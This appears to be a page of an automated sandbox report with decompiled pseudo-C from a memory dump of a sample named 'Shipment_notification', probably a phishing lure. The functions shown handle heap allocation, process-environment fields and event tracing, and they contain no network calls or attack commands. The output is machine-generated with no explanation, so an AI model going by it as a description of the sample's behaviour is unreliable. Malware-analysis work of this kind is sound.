                                                                                0x01b43779
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b43782
                                                                                0x01b43787
                                                                                0x01b43789
                                                                                0x01b43790
                                                                                0x01b43790
                                                                                0x01b4378b
                                                                                0x01b4378b
                                                                                0x01b4378b
                                                                                0x01b43792
                                                                                0x01b43795
                                                                                0x01b43795
                                                                                0x01b43798
                                                                                0x01b43798
                                                                                0x01b4379b
                                                                                0x01b4379b
                                                                                0x01ae91a3
                                                                                0x01ae91a9
                                                                                0x01ae91b0
                                                                                0x01ae91b4
                                                                                0x01ae91b4
                                                                                0x01ae91bb
                                                                                0x01ae91c0
                                                                                0x01ae91c5
                                                                                0x01ae91c7
                                                                                0x01b437da
                                                                                0x01ae91cd
                                                                                0x01ae91cd
                                                                                0x01ae91cd
                                                                                0x01ae91d2
                                                                                0x01ae91d5
                                                                                0x01ae9239
                                                                                0x01ae9239
                                                                                0x01ae91d7
                                                                                0x01ae91db
                                                                                0x01ae91e1
                                                                                0x01ae91e7
                                                                                0x01ae91fd
                                                                                0x01ae9203
                                                                                0x01ae921e
                                                                                0x01ae9223
                                                                                0x00000000
                                                                                0x01ae9223
                                                                                0x01ae9205
                                                                                0x01ae9208
                                                                                0x01ae920c
                                                                                0x01ae9214
                                                                                0x01ae9214
                                                                                0x01ae91e9
                                                                                0x01ae91e9
                                                                                0x01ae91ee
                                                                                0x01ae91f3
                                                                                0x01ae91f3
                                                                                0x01ae91f3
                                                                                0x01ae91e7
                                                                                0x00000000
                                                                                0x01ae91db
                                                                                0x01ae9187
                                                                                0x01ae9168

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1c194f680cf646d85c38ecda23b680b293296737b6f974985341b0f00371ebe4
                                                                                • Instruction ID: d1ac8a4d359012a6c19af3821cc173a4a231c89b9a24433f824e19cf81cc917b
                                                                                • Opcode Fuzzy Hash: 1c194f680cf646d85c38ecda23b680b293296737b6f974985341b0f00371ebe4
                                                                                • Instruction Fuzzy Hash: 46318C75A01385DFEB6ADBACC48CBAEBBF1BB48368F18818DD50467251D370E980CB51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 53%
                                                                                			E01B00050(void* __ecx) {
                                                                                				signed int _v8;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				intOrPtr* _t30;
                                                                                				intOrPtr* _t31;
                                                                                				signed int _t34;
                                                                                				void* _t40;
                                                                                				void* _t41;
                                                                                				signed int _t44;
                                                                                				intOrPtr _t47;
                                                                                				signed int _t58;
                                                                                				void* _t59;
                                                                                				void* _t61;
                                                                                				void* _t62;
                                                                                				signed int _t64;
                                                                                
                                                                                				_push(__ecx);
                                                                                				_v8 =  *0x1bdd360 ^ _t64;
                                                                                				_t61 = __ecx;
                                                                                				_t2 = _t61 + 0x20; // 0x20
                                                                                				E01B19ED0(_t2, 1, 0);
                                                                                				_t52 =  *(_t61 + 0x8c);
                                                                                				_t4 = _t61 + 0x8c; // 0x8c
                                                                                				_t40 = _t4;
                                                                                				do {
                                                                                					_t44 = _t52;
                                                                                					_t58 = _t52 & 0x00000001;
                                                                                					_t24 = _t44;
                                                                                					asm("lock cmpxchg [ebx], edx");
                                                                                					_t52 = _t44;
                                                                                				} while (_t52 != _t44);
                                                                                				if(_t58 == 0) {
                                                                                					L7:
                                                                                					_pop(_t59);
                                                                                					_pop(_t62);
                                                                                					_pop(_t41);
                                                                                					return L01B2B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                                                                                				}
                                                                                				asm("lock xadd [esi], eax");
                                                                                				_t47 =  *[fs:0x18];
                                                                                				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                                                                                				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                                                                                				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                                				if(_t30 != 0) {
                                                                                					if( *_t30 == 0) {
                                                                                						goto L4;
                                                                                					}
                                                                                					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                					L5:
                                                                                					if( *_t31 != 0) {
                                                                                						_t18 = _t61 + 0x78; // 0x78
                                                                                						E01BB8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                                                                                					}
                                                                                					_t52 =  *(_t61 + 0x5c);
                                                                                					_t11 = _t61 + 0x78; // 0x78
                                                                                					_t34 = E01B19702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                                                                                					_t24 = _t34 | 0xffffffff;
                                                                                					asm("lock xadd [esi], eax");
                                                                                					if((_t34 | 0xffffffff) == 0) {
                                                                                						 *0x1bdb1e0(_t61);
                                                                                						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                                                                                					}
                                                                                					goto L7;
                                                                                				}
                                                                                				L4:
                                                                                				_t31 = 0x7ffe0386;
                                                                                				goto L5;
                                                                                			}





















                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b05fafbe1356aa384c0700fa483076e736359c4671ee17754a2b25015ec9bc8a
                                                                                • Instruction ID: 69f25fc5daf0373626560b0373a969449b3111fe7232baec91e1792f1fa1d2b7
                                                                                • Opcode Fuzzy Hash: b05fafbe1356aa384c0700fa483076e736359c4671ee17754a2b25015ec9bc8a
                                                                                • Instruction Fuzzy Hash: 1331C331201B05CFD72ADF28C840B56B7E5FF89754F1485ADE596C7B90EB71A801CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 77%
                                                                                			E01B66C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                                                                                				signed short* _v8;
                                                                                				signed char _v12;
                                                                                				void* _t22;
                                                                                				signed char* _t23;
                                                                                				intOrPtr _t24;
                                                                                				signed short* _t44;
                                                                                				void* _t47;
                                                                                				signed char* _t56;
                                                                                				signed char* _t58;
                                                                                
                                                                                				_t48 = __ecx;
                                                                                				_push(__ecx);
                                                                                				_push(__ecx);
                                                                                				_t44 = __ecx;
                                                                                				_v12 = __edx;
                                                                                				_v8 = __ecx;
                                                                                				_t22 = E01B07D50();
                                                                                				_t58 = 0x7ffe0384;
                                                                                				if(_t22 == 0) {
                                                                                					_t23 = 0x7ffe0384;
                                                                                				} else {
                                                                                					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                				}
                                                                                				if( *_t23 != 0) {
                                                                                					_t24 =  *0x1bd7b9c; // 0x0
                                                                                					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                                                                                					_t23 = L01B04620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                                                                                					_t56 = _t23;
                                                                                					if(_t56 != 0) {
                                                                                						_t56[0x24] = _a4;
                                                                                						_t56[0x28] = _a8;
                                                                                						_t56[6] = 0x1420;
                                                                                						_t56[0x20] = _v12;
                                                                                						_t14 =  &(_t56[0x2c]); // 0x2c
                                                                                						E01B2F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                                                                                						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                                                                                						if(E01B07D50() != 0) {
                                                                                							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                						}
                                                                                						_push(_t56);
                                                                                						_push(_t47 - 0x20);
                                                                                						_push(0x402);
                                                                                						_push( *_t58 & 0x000000ff);
                                                                                						E01B29AE0();
                                                                                						_t23 = L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                                                                                					}
                                                                                				}
                                                                                				return _t23;
                                                                                			}













                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 317d20e5cdacc76091a73f154967d4aa5c4c6de5c20223ce99922f7b1044f3d3
                                                                                • Instruction ID: ed99a3125cf9b08be451a78e51017250cd8e26412fa6741476cc791d1a8687cf
                                                                                • Opcode Fuzzy Hash: 317d20e5cdacc76091a73f154967d4aa5c4c6de5c20223ce99922f7b1044f3d3
                                                                                • Instruction Fuzzy Hash: A821A071A00A55AFDB19DB58D840E65B7B8FF58740F0401A9F908D7791DB38ED10CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 82%
                                                                                			E01B290AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                                                                                				intOrPtr* _v0;
                                                                                				void* _v8;
                                                                                				signed int _v12;
                                                                                				intOrPtr _v16;
                                                                                				char _v36;
                                                                                				void* _t38;
                                                                                				intOrPtr _t41;
                                                                                				void* _t44;
                                                                                				signed int _t45;
                                                                                				intOrPtr* _t49;
                                                                                				signed int _t57;
                                                                                				signed int _t58;
                                                                                				intOrPtr* _t59;
                                                                                				void* _t62;
                                                                                				void* _t63;
                                                                                				void* _t65;
                                                                                				void* _t66;
                                                                                				signed int _t69;
                                                                                				intOrPtr* _t70;
                                                                                				void* _t71;
                                                                                				intOrPtr* _t72;
                                                                                				intOrPtr* _t73;
                                                                                				char _t74;
                                                                                
                                                                                				_t65 = __edx;
                                                                                				_t57 = _a4;
                                                                                				_t32 = __ecx;
                                                                                				_v8 = __edx;
                                                                                				_t3 = _t32 + 0x14c; // 0x14c
                                                                                				_t70 = _t3;
                                                                                				_v16 = __ecx;
                                                                                				_t72 =  *_t70;
                                                                                				while(_t72 != _t70) {
                                                                                					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                                                                                						L24:
                                                                                						_t72 =  *_t72;
                                                                                						continue;
                                                                                					}
                                                                                					_t30 = _t72 + 0x10; // 0x10
                                                                                					if(E01B3D4F0(_t30, _t65, _t57) == _t57) {
                                                                                						return 0xb7;
                                                                                					}
                                                                                					_t65 = _v8;
                                                                                					goto L24;
                                                                                				}
                                                                                				_t61 = _t57;
                                                                                				_push( &_v12);
                                                                                				_t66 = 0x10;
                                                                                				if(E01B1E5E0(_t57, _t66) < 0) {
                                                                                					return 0x216;
                                                                                				}
                                                                                				_t73 = L01B04620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                                                                                				if(_t73 == 0) {
                                                                                					_t38 = 0xe;
                                                                                					return _t38;
                                                                                				}
                                                                                				_t9 = _t73 + 0x10; // 0x10
                                                                                				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                                                                                				E01B2F3E0(_t9, _v8, _t57);
                                                                                				_t41 =  *_t70;
                                                                                				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                                                                                					_t62 = 3;
                                                                                					asm("int 0x29");
                                                                                					_push(_t62);
                                                                                					_push(_t57);
                                                                                					_push(_t73);
                                                                                					_push(_t70);
                                                                                					_t71 = _t62;
                                                                                					_t74 = 0;
                                                                                					_v36 = 0;
                                                                                					_t63 = E01B1A2F0(_t62, _t71, 1, 6,  &_v36);
                                                                                					if(_t63 == 0) {
                                                                                						L20:
                                                                                						_t44 = 0x57;
                                                                                						return _t44;
                                                                                					}
                                                                                					_t45 = _v12;
                                                                                					_t58 = 0x1c;
                                                                                					if(_t45 < _t58) {
                                                                                						goto L20;
                                                                                					}
                                                                                					_t69 = _t45 / _t58;
                                                                                					if(_t69 == 0) {
                                                                                						L19:
                                                                                						return 0xe8;
                                                                                					}
                                                                                					_t59 = _v0;
                                                                                					do {
                                                                                						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                                                                                							goto L18;
                                                                                						}
                                                                                						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                                                                                						 *_t59 = _t49;
                                                                                						if( *_t49 != 0x53445352) {
                                                                                							goto L18;
                                                                                						}
                                                                                						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                                                                                						return 0;
                                                                                						L18:
                                                                                						_t63 = _t63 + 0x1c;
                                                                                						_t74 = _t74 + 1;
                                                                                					} while (_t74 < _t69);
                                                                                					goto L19;
                                                                                				}
                                                                                				 *_t73 = _t41;
                                                                                				 *((intOrPtr*)(_t73 + 4)) = _t70;
                                                                                				 *((intOrPtr*)(_t41 + 4)) = _t73;
                                                                                				 *_t70 = _t73;
                                                                                				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                                                                                				return 0;
                                                                                			}



























                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                • Instruction ID: 870470fd0a076d674d9f835ee08a30675db17180ca10fca9440fc1ab70bff887
                                                                                • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                • Instruction Fuzzy Hash: 37218E71A00225EFDB25DF5AC844AAAFBF8EF54354F1488AAE94DA7200D330ED04CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 59%
                                                                                			E01B13B7A(void* __ecx) {
                                                                                				signed int _v8;
                                                                                				char _v12;
                                                                                				intOrPtr _v20;
                                                                                				intOrPtr _t17;
                                                                                				intOrPtr _t26;
                                                                                				void* _t35;
                                                                                				void* _t38;
                                                                                				void* _t41;
                                                                                				intOrPtr _t44;
                                                                                
                                                                                				_t17 =  *0x1bd84c4; // 0x0
                                                                                				_v12 = 1;
                                                                                				_v8 =  *0x1bd84c0 * 0x4c;
                                                                                				_t41 = __ecx;
                                                                                				_t35 = L01B04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x1bd84c0 * 0x4c);
                                                                                				if(_t35 == 0) {
                                                                                					_t44 = 0xc0000017;
                                                                                				} else {
                                                                                					_push( &_v8);
                                                                                					_push(_v8);
                                                                                					_push(_t35);
                                                                                					_push(4);
                                                                                					_push( &_v12);
                                                                                					_push(0x6b);
                                                                                					_t44 = E01B2AA90();
                                                                                					_v20 = _t44;
                                                                                					if(_t44 >= 0) {
                                                                                						E01B2FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x1bd84c0 * 0xc);
                                                                                						_t38 = _t35;
                                                                                						if(_t35 < _v8 + _t35) {
                                                                                							do {
                                                                                								asm("movsd");
                                                                                								asm("movsd");
                                                                                								asm("movsd");
                                                                                								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                                                                                							} while (_t38 < _v8 + _t35);
                                                                                							_t44 = _v20;
                                                                                						}
                                                                                					}
                                                                                					_t26 =  *0x1bd84c4; // 0x0
                                                                                					L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                                                                                				}
                                                                                				return _t44;
                                                                                			}













                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: aacd1f4c03a5d7b18a1a2d538ace0454eda80441c6a7e3a26c71faf1ae7ffd1b
                                                                                • Instruction ID: cfea3fc55830cef5ef0b639563819d886a2c01ec1a1302a8b101db9c5290841e
                                                                                • Opcode Fuzzy Hash: aacd1f4c03a5d7b18a1a2d538ace0454eda80441c6a7e3a26c71faf1ae7ffd1b
                                                                                • Instruction Fuzzy Hash: AA218072600119EFCB19DF58CD81F5ABBBDFF44758F1500A8EA08AB251E771AD058B90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 80%
                                                                                			E01B66CF0(void* __edx, intOrPtr _a4, short _a8) {
                                                                                				char _v8;
                                                                                				char _v12;
                                                                                				char _v16;
                                                                                				char _v20;
                                                                                				char _v28;
                                                                                				char _v36;
                                                                                				char _v52;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed char* _t21;
                                                                                				void* _t24;
                                                                                				void* _t36;
                                                                                				void* _t38;
                                                                                				void* _t46;
                                                                                
                                                                                				_push(_t36);
                                                                                				_t46 = __edx;
                                                                                				_v12 = 0;
                                                                                				_v8 = 0;
                                                                                				_v20 = 0;
                                                                                				_v16 = 0;
                                                                                				if(E01B07D50() == 0) {
                                                                                					_t21 = 0x7ffe0384;
                                                                                				} else {
                                                                                					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                				}
                                                                                				if( *_t21 != 0) {
                                                                                					_t21 =  *[fs:0x30];
                                                                                					if((_t21[0x240] & 0x00000004) != 0) {
                                                                                						if(E01B07D50() == 0) {
                                                                                							_t21 = 0x7ffe0385;
                                                                                						} else {
                                                                                							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                						}
                                                                                						if(( *_t21 & 0x00000020) != 0) {
                                                                                							_t56 = _t46;
                                                                                							if(_t46 == 0) {
                                                                                								_t46 = 0x1ac5c80;
                                                                                							}
                                                                                							_push(_t46);
                                                                                							_push( &_v12);
                                                                                							_t24 = E01B1F6E0(_t36, 0, _t46, _t56);
                                                                                							_push(_a4);
                                                                                							_t38 = _t24;
                                                                                							_push( &_v28);
                                                                                							_t21 = E01B1F6E0(_t38, 0, _t46, _t56);
                                                                                							if(_t38 != 0) {
                                                                                								if(_t21 != 0) {
                                                                                									E01B67016(_a8, 0, 0, 0,  &_v36,  &_v28);
                                                                                									L01B02400( &_v52);
                                                                                								}
                                                                                								_t21 = L01B02400( &_v28);
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return _t21;
                                                                                			}




















                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d46b2e3ff82b8bb0032ab365a40abd3f75be3c9da044aec763503df87dbbeef8
                                                                                • Instruction ID: b82aac695b6bb86a8b898fb588e993ffe9d158da512b13611525efdbefe0e864
                                                                                • Opcode Fuzzy Hash: d46b2e3ff82b8bb0032ab365a40abd3f75be3c9da044aec763503df87dbbeef8
                                                                                • Instruction Fuzzy Hash: 842107725043459BD71ADF29C944B6BBBECEFB1780F0405E6FA40C7291EB38D548C6A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 67%
                                                                                			E01BB070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                                                				char _v8;
                                                                                				intOrPtr _v11;
                                                                                				signed int _v12;
                                                                                				intOrPtr _v15;
                                                                                				signed int _v16;
                                                                                				intOrPtr _v28;
                                                                                				void* __ebx;
                                                                                				char* _t32;
                                                                                				signed int* _t38;
                                                                                				signed int _t60;
                                                                                
                                                                                				_t38 = __ecx;
                                                                                				_v16 = __edx;
                                                                                				_t60 = E01BB07DF(__ecx, __edx,  &_a4,  &_a8, 2);
                                                                                				if(_t60 != 0) {
                                                                                					_t7 = _t38 + 0x38; // 0x29cd5903
                                                                                					_push( *_t7);
                                                                                					_t9 = _t38 + 0x34; // 0x6adeeb00
                                                                                					_push( *_t9);
                                                                                					_v12 = _a8 << 0xc;
                                                                                					_t11 = _t38 + 4; // 0x5de58b5b
                                                                                					_push(0x4000);
                                                                                					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                                                                                					E01BAAFDE( &_v8,  &_v12);
                                                                                					E01BB1293(_t38, _v28, _t60);
                                                                                					if(E01B07D50() == 0) {
                                                                                						_t32 = 0x7ffe0380;
                                                                                					} else {
                                                                                						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                					}
                                                                                					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                						_t21 = _t38 + 0x3c; // 0xc3595e5f
                                                                                						E01BA14FB(_t38,  *_t21, _v11, _v15, 0xd);
                                                                                					}
                                                                                				}
                                                                                				return  ~_t60;
                                                                                			}














                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                • Instruction ID: 375ab42a16de756a3d71605a2a7235a75673a011db5589c4d485203564b8789b
                                                                                • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                • Instruction Fuzzy Hash: 78213776204200AFD709EF1CC880BBBBBA5EFD0350F0486A9F9948B781CB70D909CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 82%
                                                                                			E01B67794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr _v12;
                                                                                				intOrPtr _t21;
                                                                                				void* _t24;
                                                                                				intOrPtr _t25;
                                                                                				void* _t36;
                                                                                				short _t39;
                                                                                				signed char* _t42;
                                                                                				unsigned int _t46;
                                                                                				void* _t50;
                                                                                
                                                                                				_push(__ecx);
                                                                                				_push(__ecx);
                                                                                				_t21 =  *0x1bd7b9c; // 0x0
                                                                                				_t46 = _a8;
                                                                                				_v12 = __edx;
                                                                                				_v8 = __ecx;
                                                                                				_t4 = _t46 + 0x2e; // 0x2e
                                                                                				_t36 = _t4;
                                                                                				_t24 = L01B04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                                                                                				_t50 = _t24;
                                                                                				if(_t50 != 0) {
                                                                                					_t25 = _a4;
                                                                                					if(_t25 == 5) {
                                                                                						L3:
                                                                                						_t39 = 0x14b1;
                                                                                					} else {
                                                                                						_t39 = 0x14b0;
                                                                                						if(_t25 == 6) {
                                                                                							goto L3;
                                                                                						}
                                                                                					}
                                                                                					 *((short*)(_t50 + 6)) = _t39;
                                                                                					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                                                                                					_t11 = _t50 + 0x2c; // 0x2c
                                                                                					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                                                                                					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                                                                                					E01B2F3E0(_t11, _a12, _t46);
                                                                                					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                                                                                					if(E01B07D50() == 0) {
                                                                                						_t42 = 0x7ffe0384;
                                                                                					} else {
                                                                                						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                					}
                                                                                					_push(_t50);
                                                                                					_t19 = _t36 - 0x20; // 0xe
                                                                                					_push(0x403);
                                                                                					_push( *_t42 & 0x000000ff);
                                                                                					E01B29AE0();
                                                                                					_t24 = L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                                                                                				}
                                                                                				return _t24;
                                                                                			}













                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8151e9ec0e938c44ba6ce8e7f31dc91af1117396d2a80c1ac58a9e6f950174b0
                                                                                • Instruction ID: 36929f3b13682aecf3b32af021fce7eb22b072fa28aed7d05623259dc7fe5182
                                                                                • Opcode Fuzzy Hash: 8151e9ec0e938c44ba6ce8e7f31dc91af1117396d2a80c1ac58a9e6f950174b0
                                                                                • Instruction Fuzzy Hash: 9D216272500604ABCB29DF69D890E67BBADEF58740F1045ADF609D7650EB34E900CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E01B1FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                				intOrPtr _v8;
                                                                                				void* _t19;
                                                                                				intOrPtr _t29;
                                                                                				intOrPtr _t32;
                                                                                				intOrPtr _t35;
                                                                                				intOrPtr _t37;
                                                                                				intOrPtr* _t40;
                                                                                
                                                                                				_t35 = __edx;
                                                                                				_push(__ecx);
                                                                                				_push(__ecx);
                                                                                				_t37 = 0;
                                                                                				_v8 = __edx;
                                                                                				_t29 = __ecx;
                                                                                				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                                                                                					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                                                                                					L3:
                                                                                					_t19 = _a4 - 4;
                                                                                					if(_t19 != 0) {
                                                                                						if(_t19 != 1) {
                                                                                							L7:
                                                                                							return _t37;
                                                                                						}
                                                                                						if(_t35 == 0) {
                                                                                							L11:
                                                                                							_t37 = 0xc000000d;
                                                                                							goto L7;
                                                                                						}
                                                                                						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                                                                                							L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                                                                                							_t35 = _v8;
                                                                                						}
                                                                                						 *((intOrPtr*)(_t40 + 4)) = _t35;
                                                                                						goto L7;
                                                                                					}
                                                                                					if(_t29 == 0) {
                                                                                						goto L11;
                                                                                					}
                                                                                					_t32 =  *_t40;
                                                                                					if(_t32 != 0) {
                                                                                						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                                                                                						E01AF76E2( *_t40);
                                                                                					}
                                                                                					 *_t40 = _t29;
                                                                                					goto L7;
                                                                                				}
                                                                                				_t40 = L01B04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                                                                                				if(_t40 == 0) {
                                                                                					_t37 = 0xc0000017;
                                                                                					goto L7;
                                                                                				}
                                                                                				_t35 = _v8;
                                                                                				 *_t40 = 0;
                                                                                				 *((intOrPtr*)(_t40 + 4)) = 0;
                                                                                				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                                                                                				goto L3;
                                                                                			}










                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                • Instruction ID: c0e53c93fd6a1f69cda0814ceeb3f78df68ad1da344670e50113725798d98888
                                                                                • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                • Instruction Fuzzy Hash: 1D21AC72600A40DBD739CF4DC640A76FBE5EB98A10F6681BEE94587619D730AC05CB80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 54%
                                                                                			E01B1B390(void* __ecx, intOrPtr _a4) {
                                                                                				signed int _v8;
                                                                                				signed char _t12;
                                                                                				signed int _t16;
                                                                                				signed int _t21;
                                                                                				void* _t28;
                                                                                				signed int _t30;
                                                                                				signed int _t36;
                                                                                				signed int _t41;
                                                                                
                                                                                				_push(__ecx);
                                                                                				_t41 = _a4 + 0xffffffb8;
                                                                                				E01B02280(_t12, 0x1bd8608);
                                                                                				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
